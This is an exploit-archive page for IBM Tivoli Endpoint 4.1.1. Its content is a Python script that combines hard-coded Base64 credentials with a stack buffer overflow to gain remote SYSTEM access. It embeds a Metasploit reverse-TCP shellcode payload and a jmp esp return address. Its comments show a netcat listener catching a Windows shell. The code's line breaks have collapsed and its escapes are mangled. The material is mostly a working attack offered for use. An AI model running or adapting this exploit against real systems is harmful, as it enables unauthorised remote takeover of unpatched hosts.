[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Published : 2011-06-07
# Author : Jeremy Brown
# Previous Title : Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)
# Next Title : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute


			
#!/usr/bin/python# tiv-sys.py# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit# Jeremy Brown [0xjbrown41-gmail-com]# June 2011## Discovered by: Brian Adeloye of Tenable Network Security## This exploit makes use of two vulnerabilities:## 1) Base64 authentication credentials hard-coded in lcfd.exe# 2) Stack-based buffer overflow when parsing HTTP variable values## Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3## $ python tiv-sys.py 192.168.0.188# .....# $ nc -v -l 4444# Connection from 192.168.0.188 port 4444 [tcp/*] accepted# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:/Program Files/Tivoli/lcf/dat/1>## References:## http://www.zerodayinitiative.com/advisories/ZDI-11-169/# https://www-304.ibm.com/support/docview.wss?uid=swg21499146#import sysimport structimport socketimport httplibimport urllibport=9495ret=0x7C96BF33 # jmp esp @ user32.dlljunk="B"*256# windows/shell_reverse_tcp - 333 bytes# http://www.metasploit.com# Encoder: x86/countdown# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, # EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=payload=("/x2b/xc9/x66/xb9/x39/x01/xe8/xff/xff/xff/xff/xc1/x5e/x30""/x4c/x0e/x07/xe2/xfa/xfd/xea/x8a/x04/x05/x06/x67/x81/xec""/x3b/xd9/x68/x86/x5c/x3f/x9b/x43/x1e/x98/x46/x01/x9d/x65""/x30/x16/xad/x51/x3a/x2c/xe1/x2e/xe0/x8d/x1e/x42/x58/x27""/x0a/x07/xe9/xe6/x27/x2a/xeb/xcf/xde/x7d/x67/xba/x60/x23""/xbf/x77/x0a/x36/xe8/xb2/x7a/x43/xb9/xfd/x4a/x75/x41/x91""/x12/xc8/x0c/x5d/xcd/x1f/x68/x48/x99/xa8/x70/x04/xc5/x7b""/xdb/x50/x84/x62/xab/x64/x96/xfb/x99/x96/x57/x5a/x9b/x65""/xbe/x2a/x94/x62/x1f/x9b/x5f/x18/x42/x12/x8a/x31/xe1/x33""/x48/x6c/xbd/x09/xfb/x7d/x39/xf8/x2c/x69/x77/xa4/xf3/x7d""/xf1/x7a/xac/xf4/x3a/x5b/xa4/xda/xd9/xe2/xdd/xdf/xd7/x78""/x68/xd1/xd5/xd1/x07/x9f/x65/x09/xcd/xf9/xa1/xa1/x94/x95""/xfe/xe0/xeb/xab/xc5/xcf/xf4/xd1/xe9/xb9/xa7/x5e/x77/x1b""/x34/xa4/xa6/xa7/x81/x6d/xfe/xfb/xc4/x84/x2e/xc4/xb0/x4e""/x67/xe3/xe4/xe5/xe6/xf7/xe8/xf9/xea/xd3/x56/xb2/x61/x5f""/x3f/x14/x4b/x04/xac/x05/x6e/xc7/x0e/xa1/xc8/xcb/xdd/x91""/x47/x29/xba/xc1/x84/x84/xbc/x4c/x73/xa3/xb9/x26/x0f/xb3""/xbf/xb0/xba/xdf/x69/x02/xb5/xb4/xb3/xd4/x10/x8d/xfa/xb0""/xbc/x09/x11/x8b/x29/xab/xd4/xcd/xf3/xf2/x79/xb1/xd2/xe7""/x3e/xf9/xbe/xaf/xac/xab/xa8/xa9/x46/x57/x4c/x55/x52/x56""/x50/x6f/x71/xc5/x35/x8d/xf3/xd8/x87/xef/x5e/x47/x54/xec""/x24/x7d/x1e/x90/x05/x79/xe5/xce/xa7/xfd/x03/x35/x2a/x49""/x84/xb6/x99/xb8/xd9/xf2/x14/x2f/x56/x21/xac/xd6/xce/x5a""/x35/x8a/x75/x20/x46/x5a/x5c/x37/x6b/xc6/xef")if len(sys.argv)<2:     print "Usage: "+sys.argv[0]+" <target> [port]"     sys.exit(0)target=sys.argv[1]if len(sys.argv)==3:     port=int(sys.argv[2])retaddr=struct.pack("<L",ret)data=urllib.urlencode({"test":junk+retaddr+payload})size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:bossconn=httplib.HTTPConnection(target,port)conn.request("POST","/addr",data,hdrs)conn.close()